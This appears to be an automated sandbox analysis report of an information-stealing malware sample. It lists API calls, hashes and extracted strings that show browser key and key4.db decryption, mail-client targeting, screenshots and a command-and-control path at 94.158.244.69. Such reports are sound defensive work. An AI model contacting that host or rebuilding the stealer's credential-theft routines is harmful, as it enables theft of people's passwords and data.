                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID: VL6T$VL6T$kernel32.dll
                                                          • API String ID: 1586166983-858732239
                                                          • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                          • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                          • API String ID: 4038537762-2028718673
                                                          • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                          • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CryptDataUnprotect
                                                          • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                          • API String ID: 834300711-975908830
                                                          • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                          • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                          • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: \key4.db
                                                          • API String ID: 4038537762-2908133219
                                                          • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                          • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                          • API String ID: 0-1928883120
                                                          • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                          • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                          APIs
                                                            • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                            • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 3335090040-239921721
                                                          • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                          • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gU@
                                                          • API String ID: 0-63564854
                                                          • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                          • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                          • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                          • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F69F56
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 02F69F76
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F69000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2f69000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3833638111-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: 056a9cd8ce9a1ab0893ef63b9dea2c2658ee486a95b735d568ab11a83d6bfd2c
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: 05F096326007156FD7203BF5AC8DBBEB6ECEF497A4F110629E756910C0DBF0E8454A61
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                            • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationLibraryLoadQuerySystem
                                                          • String ID:
                                                          • API String ID: 1217483125-0
                                                          • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                          • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                          • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID:
                                                          • API String ID: 4046476035-0
                                                          • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                          • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                          APIs
                                                          • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                          • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                          • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                          • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                          • API String ID: 4038537762-1534030094
                                                          • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                          • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wctomb_s
                                                          • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                          • API String ID: 2865277502-1332857675
                                                          • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                          • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                          • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02ED024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: c888ef0d310670c98a3f762550467d8ce2b93cc8046e61e9807fb0037b26c9d0
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: C3526974A41229DFDB64CF68C984BACBBB1BF09314F1480D9E94DAB351DB30AA85CF14

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                          • DeleteDC.GDI32(00000002), ref: 00432B01
                                                          • DeleteObject.GDI32(?), ref: 00432B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$CompatibleCreateObject
                                                          • String ID:
                                                          • API String ID: 1022343127-0
                                                          • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                          • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                          • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3664257935-537541572
                                                          • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                          • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                          • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • __allrem.LIBCMT ref: 004458F2
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                          • __allrem.LIBCMT ref: 00445925
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                          • __allrem.LIBCMT ref: 0044595A
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                          • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                          • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$M%$Screen.png
                                                          • API String ID: 0-2021954137
                                                          • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                          • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                          • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                          • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: advapi32.dll$my-global-render.dll
                                                          • API String ID: 1029625771-772900288
                                                          • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                          • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                          • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^^4$^^4$~rjz
                                                          • API String ID: 0-2511145224
                                                          • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                          • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                          • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                          APIs
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharInformationMultiTimeWideZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 1123094072-239921721
                                                          • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                          • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                          • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,381389CC,?,0044387B), ref: 004439CB
                                                          • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,381389CC,?,0044387B), ref: 004439D2
                                                          • ExitProcess.KERNEL32 ref: 004439E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                          • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                          • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                          APIs
                                                          • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProfile
                                                          • String ID: advapi32.dll
                                                          • API String ID: 2104809126-4050573280
                                                          • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                          • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                          • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
